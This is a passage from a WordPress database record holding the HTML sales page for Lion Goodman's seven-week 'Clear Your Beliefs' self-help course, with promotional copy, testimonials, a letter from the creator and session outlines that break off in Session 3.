(1035, 2, '2014-06-19 01:02:53', '2014-06-19 06:02:53', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations...</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy...</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; margin-left: 40px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\r\n\r\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\r\n\r\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs.  It takes some work, and it''s <em>very </em>effective.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that 